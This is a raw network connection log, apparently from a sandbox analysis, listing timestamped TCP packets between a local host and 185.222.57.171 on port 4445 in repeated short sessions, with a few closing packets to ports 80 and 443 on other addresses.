May 11, 2021 19:41:43.244755983 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.249054909 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.323004007 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.324122906 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.340807915 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.401066065 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.401134968 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.479132891 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.480910063 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.557372093 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.560853004 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.699666023 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.747901917 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.756438017 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.803421021 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.803559065 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.850430965 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.012182951 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.060192108 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.199723959 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.298053026 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.401063919 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.457530022 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.557202101 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.557343006 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.651015043 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.651154995 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.744908094 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.745071888 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.838594913 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.838737965 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:44.932302952 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:44.934684992 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:45.025913000 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:45.028249979 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:45.119801998 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:45.184566021 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:45.276068926 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:45.276151896 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:45.369870901 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:45.387784004 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:45.479275942 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:45.528287888 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:49.558161974 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:49.604809046 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:49.605029106 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:49.728009939 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:49.786273956 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:49.786360025 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:49.854063034 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:49.854162931 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:49.901907921 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:49.902280092 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:49.979247093 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:49.979330063 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.057427883 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.057724953 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.119833946 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.152184010 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.153920889 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.200546026 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.200725079 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.276057959 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.276230097 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.323456049 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.418221951 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.466047049 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.466535091 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.526029110 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.560204029 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.635577917 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.700720072 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.776316881 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.843642950 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:50.916706085 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:50.963470936 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:51.026000023 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:51.091598988 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:51.166861057 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:51.183367968 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:51.260483027 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:51.419637918 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:51.494781971 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:51.703902006 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:51.776016951 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:51.808444977 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:51.885507107 CEST	4445	49740	185.222.57.171	192.168.2.5
May 11, 2021 19:41:51.931078911 CEST	49740	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:55.936454058 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:55.984924078 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:55.985022068 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.010318041 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.066046953 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.066948891 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.135421038 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.143002987 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.190157890 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.191994905 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.260368109 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.296569109 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.369690895 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.370879889 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.371704102 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.418205023 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.419136047 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.494838953 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.494913101 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.543726921 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.582271099 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.630170107 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.700762987 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.712182999 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.776074886 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.857448101 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:56.932297945 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:56.982464075 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.057405949 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.118827105 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.197902918 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.232661963 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.307421923 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.311229944 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.385438919 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.453414917 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.526022911 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.533468962 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.604211092 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.685848951 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.760428905 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.760524035 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.838630915 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.904408932 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:57.979229927 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:57.995342970 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:58.057298899 CEST	4445	49741	185.222.57.171	192.168.2.5
May 11, 2021 19:41:58.107877016 CEST	49741	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:02.200083971 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:02.247427940 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:02.248399019 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:02.700606108 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:02.758627892 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:02.810565948 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:02.834208965 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:02.881500959 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:02.903773069 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:02.979979038 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:02.980114937 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.057212114 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.092233896 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.152390957 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.153537989 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.199994087 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.200165033 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.276009083 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.276138067 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.323260069 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.323369980 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.369982958 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.370116949 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.447868109 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.447948933 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.510350943 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.510432005 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.588635921 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.655121088 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.729182005 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.746251106 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.807291985 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:03.873708963 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:03.948528051 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:04.052277088 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:04.120244980 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:04.191450119 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:04.276109934 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:04.277321100 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:04.338599920 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:04.422734022 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:04.494755983 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:04.498832941 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:04.588588953 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:04.781827927 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:04.847031116 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:04.854584932 CEST	4445	49742	185.222.57.171	192.168.2.5
May 11, 2021 19:42:04.854723930 CEST	49742	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:08.860938072 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:08.909914017 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:08.910037041 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:08.910577059 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:08.978705883 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:08.978995085 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.026364088 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.026546955 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.088525057 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.088648081 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.150998116 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.151068926 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.229156017 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.233550072 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.277309895 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.307274103 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.307411909 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.354207039 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.355206013 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.402115107 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.402287960 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.449224949 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.449328899 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.526005983 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.530333996 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.604172945 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.686490059 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.760353088 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.760427952 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.838617086 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.889693022 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:09.963502884 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:09.967962980 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:10.026053905 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:10.092901945 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:10.166727066 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:10.171256065 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:10.244843960 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:10.280853987 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:10.354245901 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:10.436619997 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:10.510389090 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:10.514847040 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:10.589340925 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:10.639858961 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:10.714803934 CEST	4445	49743	185.222.57.171	192.168.2.5
May 11, 2021 19:42:10.718023062 CEST	49743	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:14.739942074 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:14.787292957 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:14.787399054 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:14.788279057 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:14.845680952 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:14.845957041 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:14.893610954 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:14.895824909 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:14.964667082 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:14.964801073 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.026034117 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.026161909 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.088493109 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.090209961 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.091279984 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.138603926 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.139456034 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.186335087 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.186474085 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.233330011 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.233578920 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.308056116 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.375009060 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.447987080 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.448079109 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.526081085 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.530812979 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.604180098 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.687127113 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.760457993 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.760596991 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.838551044 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.905827045 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:15.979096889 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:15.979229927 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:16.057199955 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:16.093595028 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:16.166621923 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:16.234689951 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:16.307282925 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:16.307404995 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:16.385433912 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:16.448818922 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:16.453042984 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:16.526124954 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:16.531016111 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:16.604131937 CEST	4445	49752	185.222.57.171	192.168.2.5
May 11, 2021 19:42:16.687151909 CEST	49752	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:20.724627972 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:20.771511078 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:20.774207115 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:20.775288105 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:20.836904049 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:20.837025881 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:20.901139021 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:20.901298046 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:20.950268984 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:20.950359106 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.026108027 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.026235104 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.088562012 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.088665009 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.166728020 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.187735081 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.215012074 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.234673023 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.234806061 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.307320118 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.307411909 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.354434967 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.390697002 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.437520981 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.469569921 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.541642904 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.594729900 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.666754007 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.734498978 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.807347059 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.807496071 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:21.885500908 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:21.953180075 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:22.026000977 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:22.031503916 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:22.104270935 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:22.187783957 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:22.260426998 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:22.260543108 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:22.338562012 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:22.390753984 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:22.463563919 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:22.468894005 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:22.557297945 CEST	4445	49755	185.222.57.171	192.168.2.5
May 11, 2021 19:42:22.594079971 CEST	49755	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:24.219240904 CEST	49682	80	192.168.2.5	93.184.220.29
May 11, 2021 19:42:24.219307899 CEST	49684	80	192.168.2.5	93.184.220.29
May 11, 2021 19:42:24.219346046 CEST	49683	80	192.168.2.5	93.184.220.29
May 11, 2021 19:42:24.219799995 CEST	49676	443	192.168.2.5	20.190.160.3
May 11, 2021 19:42:24.259955883 CEST	80	49684	93.184.220.29	192.168.2.5
May 11, 2021 19:42:24.259980917 CEST	80	49682	93.184.220.29	192.168.2.5
May 11, 2021 19:42:24.259991884 CEST	80	49683	93.184.220.29	192.168.2.5
May 11, 2021 19:42:24.260126114 CEST	49684	80	192.168.2.5	93.184.220.29
May 11, 2021 19:42:24.260134935 CEST	49682	80	192.168.2.5	93.184.220.29
May 11, 2021 19:42:24.260149002 CEST	49683	80	192.168.2.5	93.184.220.29
May 11, 2021 19:42:24.266542912 CEST	443	49676	20.190.160.3	192.168.2.5
May 11, 2021 19:42:24.266688108 CEST	49676	443	192.168.2.5	20.190.160.3
May 11, 2021 19:42:24.375500917 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:42:24.375518084 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:42:24.422571898 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:42:24.422597885 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:42:24.422771931 CEST	49677	443	192.168.2.5	20.190.160.3
